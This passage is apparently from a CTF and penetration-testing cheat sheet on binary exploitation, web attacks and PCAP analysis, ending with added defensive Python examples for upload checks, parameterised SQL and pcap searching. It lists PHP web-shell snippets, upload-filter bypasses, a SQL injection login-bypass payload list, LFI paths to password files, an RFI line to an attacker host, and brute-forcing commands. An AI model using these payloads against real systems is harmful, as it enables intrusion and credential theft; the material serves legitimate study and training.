  - Address Space Layout Randomization (ASLR) = the randomization of the place in memory where the program, shared libraries, the stack, and the heap are.
  - RELRO = makes binary sections read-only.

Tools:

- Pwntools framework
- gdb debugger with PEDA, pwndbg or GEF.
- Use the `readelf -a <filename>` command. It displays information about ELF files.
- Use the `nm <filename>` command to know what symbols are referenced in the binary.
- Python

Some tips from experts. Functions that can lead to a buffer overflow:

- scanf
- read
- strcat
- fread
- fgets
- sprintf
- strcpy
- gets
- memcpy
- memmove
- strncpy
- snprintf
- strncat

## Web

*Web attacks*

### Enumeration

- Check it out in a web browser. What does it display? Read entire pages; look for emails, names, user info.
- Enumerate the interface: what version of CMS, server installation page etc.
- What potential vulnerabilities are in it? LFI, RFI, directory traversal, SQL injection, XML External Entities, OS command injection, upload vulnerabilities.
- Default web server page which reveals version information?
- Use a web application scanner (refer to the note). Example, nikto: `nikto -h 10.10.10.10 -output filename`
- Google for exploits: Rapid7, SearchSploit
- If HTTPS, scan for Heartbleed: `sslscan 192.168.101.1:443`, `nmap -sV --script=ssl-heartbleed 192.168.3.157`
- Read the certificate. Does it include names that might be useful? Correct vhost.
- View the source code: hidden values, developer remarks, extraneous code, passwords!
- Use curl: `curl <ip address / dns>`
- View robots.txt

### Brute-forcing HTTP(S) directories and files

Tools:

- dirb
- dirbuster
- nikto
- wfuzz
- gobuster for quick directory search

Tips:

- Brute-force directories recursively. If you found a directory, e.g. /admin, brute-force more deeply: `dirb http://10.10.10.1/admin/`
- Look for .git
- Set extensions: sh,txt,php,html,htm,asp,aspx,js,xml,log,json,jpg,jpeg,png,gif,doc,pdf,mpg,mp3,zip,tar.gz,tar
- Brute-force subdomains: xxx.google.com
- Creating a wordlist from a webpage: cewl
- Redirecting webpage automatically? noredirect plugin

### If it's a login page

- Try viewing the source code
- Use default passwords
- Brute-force directories first (sometimes you don't need to log in to pwn the machine)
- Brute-force credentials using curl
- Burp Suite: Sniper, Cluster bomb
- wfuzz: `wfuzz -w pass.txt -L 20 -d "username=FUZZ&password=FUZZ" -hw 1224 http://login page path`
- Search for credentials in other service ports: tftp, ftp
- Enumeration for the credentials
- Search for credentials by brute-forcing directories
- Register first
- SQL injection: SQLMap
- XSS can be used to get the admin cookie
- Brute-force the session cookie

### If it's a CMS

- Google their vulnerabilities: WordPress, Drupal, Joomla, Vtiger, etc.
- Go to the admin page: Joomla `/administrator`; WordPress `/wp-admin`, `/wp-login`

WordPress:

- `wpscan -u 192.168.3.145 --enumerate -t --enumerate u --enumerate p`
- Brute-force the login page: `wpscan -u ipaddress --username name --wordlist pathtolist`
- Random agent: `wpscan -u http://cybear32c.lab/ --random-agent`
- Zoom.py enumerates WordPress users

Drupal:

- droopescan: https://github.com/droope/droopescan
- /CHANGELOG.txt to find the version

Adobe ColdFusion:

- Metasploit - determine version: `/CFIDE/adminapi/base.cfc?wsdl`
- Version 8 vulnerability: FCKeditor, `use exploit/windows/http/coldfusion_fckeditor`
- LFI: `http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en`

Elastix:

- Google the vulnerabilities
- Default login is admin:admin at /vtigercrm/; able to upload a shell in profile-photo

### Examine configuration files - generic

- Examine httpd.conf / Windows config files
- JBoss JMX Console: http://IP:8080/jmxconcole/ , WAR file
- Joomla: configuration.php, diagnostics.php, joomla.inc.php, config.inc.php
- Mambo: configuration.php, config.inc.php
- WordPress: setup-config.php, wp-config.php
- ZyXEL:
  - /WAN.html (contains PPPoE ISP password)
  - /WLAN_General.html and /WLAN.html (contains WEP key)
  - /rpDyDNS.html (contains DDNS credentials)
  - /Firewall_DefPolicy.html (Firewall)
  - /CF_Keyword.html (Content Filter)
  - /RemMagWWW.html (Remote MGMT)
  - /rpSysAdmin.html (System)
  - /LAN_IP.html (LAN)
  - /NAT_General.html (NAT)
  - /ViewLog.html (Logs)
  - /rpFWUpload.html (Tools)
  - /DiagGeneral.html (Diagnostic)
  - /RemMagSNMP.html (SNMP Passwords)
  - /LAN_ClientList.html (Current DHCP Leases)
  - Config backups: /RestoreCfg.html, /BackupCfg.html

### Upload page

- Upload a shell to make a reverse shell
- Bypass file upload filtering:
  - Rename it and upload it as shell.php.jpg
  - Blacklisting bypass: change the extension php → phtml. `.php`, `.php3`, `.php4`, `.php5`, and `.inc` are bypassed by uploading unpopular PHP extensions such as: pht, phpt, phtml, php3, php4, php5, php6
  - asp: asp, .aspx
  - perl: .pl, .pm, .cgi, .lib
  - jsp: .jsp, .jspx, .jsw, .jsv, and .jspf
  - ColdFusion: .cfm, .cfml, .cfc, .dbm
  - Whitelisting bypass: passed by uploading a file with some kind of trick, like adding a null byte injection ( shell.php%00.gif ), or by using double extensions for the uploaded file ( shell.jpg.php )
  - GIF89a; if they check the content. Basically you just add the text "GIF89a;" before your shell code: `<? system($_GET['cmd']); // or you can insert your complete shellcode ?>`
  - In-image data manipulation: `exiftool -Comment='<?php echo "<pre>"; system($_GET['cmd']); ?>' lo.jpg`, then rename it: `mv lo.jpg lo.php.jpg`

### phpMyAdmin

- Default password root:pma

### Webmin

- Has vulnerabilities, google.

### Other

- Identify the WAF using wafw00f
- Spidering a given URL, up to a specified depth, and returning a list of words which can then be used for password crackers
- WMAP Web Scanner: web application vulnerability scanner

### Exploitation

Heartbleed exploit:

```
use auxiliary/scanner/ssl/openssl_heartbleed
set RHOSTS 192.168.3.212
set verbose true
run
```

XSS:

- Session hijacking / cookie theft. Steal the cookie to get admin privileges.
- Use the xsser tool

Local File Inclusion:

- Bypassing php execution: `http://example.com/index.php?page=php://filter/convert.base64-encode/resource=index`
- Bypassing the added .php and other extra file endings: `http://example.com/page=../../../../../../etc/passwd%00`, `http://example.com/page=../../../../../../etc/passwd?`
- Folders that always exist: /etc/hosts, /etc/resolv.conf
- Add %00jpg to the end of files: /etc/passwd%00jpg
- Refer to these for more information: https://sushant747.gitbooks.io/total-oscp-guide/local_file_inclusion.html , https://highon.coffee/blog/lfi-cheat-sheet/

Remote file inclusion:

- http://exampe.com/index.php?page=http://attackerserver.com/evil.txt

SQL Injection:

- Enumerate using nmap: `nmap -sV --script=http-sql-injection <target>`
- Using jsql
- Using sqlmap with a login page: capture the request using Burp Suite, save the request to a file, then `sqlmap -r request.txt`
- Crawl a page to find SQL injections: `sqlmap -u http://example.com --crawl=1`
- http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet

Login bypass:

```
'or 1=1- -
' or '1'=1
' or '1'=1 - -
'--
' or '1'='1
-'
' '
'&'
'^'
'*'
' or ''-'
' or '' '
' or ''&'
' or ''^'
' or ''*'
"-"
" "
"&"
"^"
"*"
" or ""-"
" or "" "
" or ""&"
" or ""^"
" or ""*"
or true--
" or true--
' or true--
") or true--
') or true--
' or 'x'='x
') or ('x')=('x
')) or (('x'))=(('x
" or "x"="x
") or ("x")=("x
")) or (("x"))=(("x
```

Known username:

```
admin' - -
admin') - -
```

Error-based DB enumeration:

- Add the tick `'`
- Enumerate columns using `order by`
- https://sushant747.gitbooks.io/total-oscp-guide/sql-injections.html

XML External Entity (XXE):

- URL vulnerability

OS command injection

Directory traversal:

- DotDotPwn tool

## PCAP analysis

Tools:

- Wireshark
- NetworkMiner
- strings
- tshark

Checklist:

- Understand the packets
- Export objects
- Protocol hierarchy gives you a general understanding
- Follow TCP streams
- Filtering
- Search for keywords such as "flag" using Find Packet
- Take a look at the Info column. Silly challenges always put the flag letter by letter in different packets.
- If the challenge is about wifi, USB or keyboard things, google past writeups for how they were solved.

Others:

- Convert pcapng to pcap: `tshark -F pcap -r file.pcapng -w newfile.pcap`
- Brute-force the WEP password for a PCAP: `aircrack-ng -b XX:XX:XX:XX:89:b3 -w ../rockyou.txt target.pcap`
- Go to Edit > Preferences > Protocols > IEEE 802.11 > Edit... button > wpa-pwd password
- USB pcap: https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/usb-keystrokes

Reference: https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection
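The upload-filtering section earlier on this page lists the tricks a blacklist check misses: an unlisted PHP extension, `shell.php.jpg`, a null byte, a `GIF89a;` prefix. As an added example that is not part of the page's own material, here is the kind of weak check those tricks defeat beside a hardened version a defender would ship; the function names and the image whitelist are my choices.

```python
import secrets

ALLOWED_IMAGE_EXTENSIONS = {"jpg", "jpeg", "png", "gif"}
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF89a", b"GIF87a")


def weak_is_allowed(filename: str) -> bool:
    """Blacklist check of the kind the upload section describes as bypassable:
    it only looks at a final '.php' suffix."""
    return not filename.lower().endswith(".php")


def hardened_is_allowed(filename: str) -> bool:
    """Whitelist check: no control characters (null-byte tricks), no path
    separators, exactly one extension, and that extension must be an image."""
    if any(ord(c) < 0x20 or ord(c) == 0x7F for c in filename):
        return False
    if "/" in filename or "\\" in filename:
        return False
    parts = filename.split(".")
    if len(parts) != 2 or not parts[0]:
        return False
    return parts[1].lower() in ALLOWED_IMAGE_EXTENSIONS


def content_is_plausible_image(data: bytes) -> bool:
    """Magic-byte check. A prefixed 'GIF89a;' passes this, which is exactly why
    the magic check alone is not enough: the stored name and handler must not
    depend on the client (see storage_name)."""
    return data.startswith(IMAGE_MAGIC)


def storage_name(filename: str) -> str:
    """Server-chosen name: random stem plus the whitelisted extension, so the
    client-supplied name never reaches the filesystem or the web server's
    handler selection."""
    if not hardened_is_allowed(filename):
        raise ValueError("rejected filename")
    ext = filename.rsplit(".", 1)[1].lower()
    return secrets.token_hex(16) + "." + ("jpg" if ext == "jpeg" else ext)


if __name__ == "__main__":
    # Constructed sample names from the page's upload section
    for name in ("shell.php.jpg", "shell.phtml", "shell.php\x00.gif", "photo.JPG"):
        print(repr(name), weak_is_allowed(name), hardened_is_allowed(name))
```

Since the `GIF89a;` trick passes `content_is_plausible_image`, the usual additional step is to store uploads outside the web root under the `storage_name` result and, for images, re-encode them with an image library so that embedded script text does not survive.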
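The login-bypass payloads in the SQL injection section work because a string-built query turns quote characters into SQL syntax. Added example, not the page's own code and not any real application: the same login written both ways against a constructed in-memory SQLite table, with `demo()` showing that the page's `' or '1'='1` input logs in through the concatenated query and is treated as a plain string by the parameterised one.

```python
import sqlite3


def new_db() -> sqlite3.Connection:
    """Constructed in-memory users table. A real system stores a password hash,
    not the password; plaintext is used only to keep the demo short."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct-password')")
    return conn


def vulnerable_login(conn, username: str, password: str) -> bool:
    """String-built query: quote characters in the input become SQL syntax,
    so the ' or '1'='1 style payloads make the WHERE clause always true."""
    query = ("SELECT COUNT(*) FROM users WHERE username = '%s' AND password = '%s'"
             % (username, password))
    return conn.execute(query).fetchone()[0] > 0


def safe_login(conn, username: str, password: str) -> bool:
    """Parameterised query: values travel separately from the SQL text, so the
    same payloads are compared as literal strings and never match a row."""
    query = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(query, (username, password)).fetchone()[0] > 0


def demo() -> dict:
    """Run both logins with a bypass payload from the page and with real credentials."""
    conn = new_db()
    bypass_user, bypass_pass = "x", "' or '1'='1"
    return {
        "vulnerable_bypassed": vulnerable_login(conn, bypass_user, bypass_pass),
        "safe_bypassed": safe_login(conn, bypass_user, bypass_pass),
        "safe_valid": safe_login(conn, "admin", "correct-password"),
        "safe_wrong": safe_login(conn, "admin", "wrong"),
    }


if __name__ == "__main__":
    print(demo())   # {'vulnerable_bypassed': True, 'safe_bypassed': False, 'safe_valid': True, 'safe_wrong': False}
```

The `?` placeholders are SQLite's style; other drivers use `%s` or `:name`, but the rule is the same: the query text never contains user input.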
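For the PCAP checklist above (search for a keyword, and the flag spread one letter per packet), an added example that is not the page's own code: a minimal classic-pcap reader that strips Ethernet/IPv4/TCP headers and searches both each payload and all payloads joined in capture order. The capture it runs on is constructed inline; `iter_frames`, `tcp_payload` and `search_payloads` are my names.

```python
import struct

ETHERTYPE_IPV4 = 0x0800
IPPROTO_TCP = 6
LINKTYPE_ETHERNET = 1


def iter_frames(pcap: bytes):
    """Yield raw frames from a classic pcap buffer (pcapng is not handled:
    convert it with `tshark -F pcap` first). Both byte orders accepted."""
    (magic,) = struct.unpack_from("<I", pcap, 0)
    if magic == 0xA1B2C3D4:
        end = "<"
    elif magic == 0xD4C3B2A1:
        end = ">"
    else:
        raise ValueError("not a classic pcap file")
    linktype = struct.unpack_from(end + "IHHiIII", pcap, 0)[6]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError("only Ethernet captures handled here, got linktype %d" % linktype)
    pos = 24                                   # global header is 24 bytes
    while pos + 16 <= len(pcap):
        _sec, _usec, incl_len, _orig_len = struct.unpack_from(end + "IIII", pcap, pos)
        yield pcap[pos + 16: pos + 16 + incl_len]
        pos += 16 + incl_len


def tcp_payload(frame: bytes):
    """Strip Ethernet/IPv4/TCP headers (honouring IHL and the TCP data offset)
    and return the payload, or None when the frame is not IPv4/TCP."""
    if len(frame) < 34 or struct.unpack_from("!H", frame, 12)[0] != ETHERTYPE_IPV4:
        return None
    ihl = (frame[14] & 0x0F) * 4
    if frame[14 + 9] != IPPROTO_TCP:
        return None
    (total_len,) = struct.unpack_from("!H", frame, 16)
    tcp_off = 14 + ihl
    data_off = (frame[tcp_off + 12] >> 4) * 4
    return frame[tcp_off + data_off: 14 + total_len]


def search_payloads(pcap: bytes, needle: bytes) -> dict:
    """Look for `needle` in each TCP payload and in all payloads joined in
    capture order, which catches a flag spread one character per packet."""
    payloads = [p for p in map(tcp_payload, iter_frames(pcap)) if p]
    joined = b"".join(payloads)
    return {
        "per_packet": [i for i, p in enumerate(payloads) if needle in p],
        "in_joined": needle in joined,
        "joined": joined,
    }


def _frame(payload: bytes, seq: int) -> bytes:
    """Constructed Ethernet/IPv4/TCP frame; checksums are zero since nothing here verifies them."""
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 40 + len(payload), 0, 0, 64,
                     IPPROTO_TCP, 0, bytes([10, 0, 0, 1]), bytes([10, 0, 0, 2]))
    tcp = struct.pack("!HHIIBBHHH", 40000, 1337, seq, 0, 5 << 4, 0x18, 8192, 0, 0)
    return eth + ip + tcp + payload


def build_sample_pcap(payloads) -> bytes:
    """Constructed little-endian pcap with one frame per payload."""
    out = [struct.pack("<IHHiIII", 0xA1B2C3D4, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)]
    for i, p in enumerate(payloads):
        frame = _frame(p, 1000 + i)
        out.append(struct.pack("<IIII", 1700000000 + i, 0, len(frame), len(frame)) + frame)
    return b"".join(out)


# Constructed capture: one HTTP response, then a flag spread one byte per packet
SAMPLE_PCAP = build_sample_pcap(
    [b"HTTP/1.1 200 OK\r\n\r\n"] + [bytes([c]) for c in b"flag{pcap}"])

if __name__ == "__main__":
    print(search_payloads(SAMPLE_PCAP, b"flag{"))
```

On a real capture, `search_payloads(open("capture.pcap", "rb").read(), b"flag{")` reports an empty `per_packet` list but `in_joined` true for the letter-per-packet case; for a proper per-connection view, group payloads by the (src, dst, ports) tuple before joining, which is what Wireshark's Follow TCP Stream does.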